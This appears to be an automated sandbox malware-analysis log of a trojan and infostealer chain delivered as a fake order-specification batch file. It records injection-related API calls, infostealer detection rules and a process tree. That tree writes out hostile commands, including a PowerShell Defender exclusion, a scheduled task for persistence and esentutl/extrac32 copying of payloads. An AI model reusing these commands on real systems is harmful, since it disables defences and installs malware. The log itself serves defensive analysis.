                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02E5DC04
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E58D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02E58D70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_02E5DD70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E57D78 NtWriteVirtualMemory,4_2_02E57D78
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E57A2A NtAllocateVirtualMemory,4_2_02E57A2A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02E5DBB0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E58D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02E58D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F38670 NtUnmapViewOfSection,26_2_02F38670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F38400 NtReadVirtualMemory,26_2_02F38400
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F37A2C NtAllocateVirtualMemory,26_2_02F37A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F38D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,26_2_02F38D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F3DD70 NtOpenFile,NtReadFile,NtClose,26_2_02F3DD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F37D78 NtWriteVirtualMemory,26_2_02F37D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F386F7 NtUnmapViewOfSection,26_2_02F386F7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F37AC9 NtAllocateVirtualMemory,26_2_02F37AC9
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F37A2A NtAllocateVirtualMemory,26_2_02F37A2A
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F38D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,26_2_02F38D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EF8670 NtUnmapViewOfSection,32_2_02EF8670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EF8400 NtReadVirtualMemory,32_2_02EF8400
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EF7A2C NtAllocateVirtualMemory,32_2_02EF7A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EF7D78 NtWriteVirtualMemory,32_2_02EF7D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EF8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,32_2_02EF8D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EFDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,32_2_02EFDD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EF86F7 NtUnmapViewOfSection,32_2_02EF86F7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EF7A2A NtAllocateVirtualMemory,32_2_02EF7A2A
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EFDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,32_2_02EFDBB0
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EFDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,32_2_02EFDC8C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EFDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,32_2_02EFDC04
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EF8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,32_2_02EF8D6E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,4_2_02E5F7C8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E420C44_2_02E420C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_0121AA4213_2_0121AA42
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_0121EA8013_2_0121EA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_01214A9813_2_01214A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_0121DF0013_2_0121DF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_01213E8013_2_01213E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_012141C813_2_012141C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_0121DF0013_2_0121DF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A956B813_2_06A956B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A966E813_2_06A966E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A9C2A013_2_06A9C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A9B32A13_2_06A9B32A
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A9317813_2_06A93178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A97E7813_2_06A97E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A9779813_2_06A97798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A9E4C013_2_06A9E4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A9235013_2_06A92350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A9004013_2_06A90040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A95DDF13_2_06A95DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06A9000613_2_06A90006
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 14_2_009885B714_2_009885B7
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 14_2_009885C814_2_009885C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0499B49016_2_0499B490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0499B47016_2_0499B470
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065EDAAC20_2_065EDAAC
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065E1B9420_2_065E1B94
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065EE60820_2_065EE608
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065E25B820_2_065E25B8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065E25A820_2_065E25A8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065E417420_2_065E4174
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065E1D2020_2_065E1D20
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065E1B8820_2_065E1B88
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_0666336020_2_06663360
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02F220C426_2_02F220C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_011641C829_2_011641C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_01164A9829_2_01164A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0116EA8029_2_0116EA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0116DF0029_2_0116DF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_01163E8029_2_01163E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0116DF0029_2_0116DF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0116A98829_2_0116A988
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_069256B829_2_069256B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_069266E829_2_069266E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06927E7829_2_06927E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0692C2A029_2_0692C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0692B32A29_2_0692B32A
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0692317829_2_06923178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0692779829_2_06927798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0692E4C029_2_0692E4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06925DDF29_2_06925DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0692235029_2_06922350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0692004029_2_06920040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_0692000629_2_06920006
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 32_2_02EE20C432_2_02EE20C4
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02E44860 appears 949 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02E44500 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02E444DC appears 74 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02E5894C appears 56 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02E589D0 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02E446D4 appears 244 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02F24860 appears 683 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02F3894C appears 50 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02F246D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02EF894C appears 50 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02EE46D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02EE4860 appears 683 times
                      Source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: armsvc.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: armsvc.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winBAT@55/27@3/3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E47FD4 GetDiskFreeSpaceA,4_2_02E47FD4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E56DC8 CoCreateInstance,4_2_02E56DC8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-74b31e1c42af9477-inf
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3496:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-74b31e1c42af9477cd68e75b-b
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB08060.TMPJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batReversingLabs: Detection: 23%
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_12-258
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                      Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /oJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
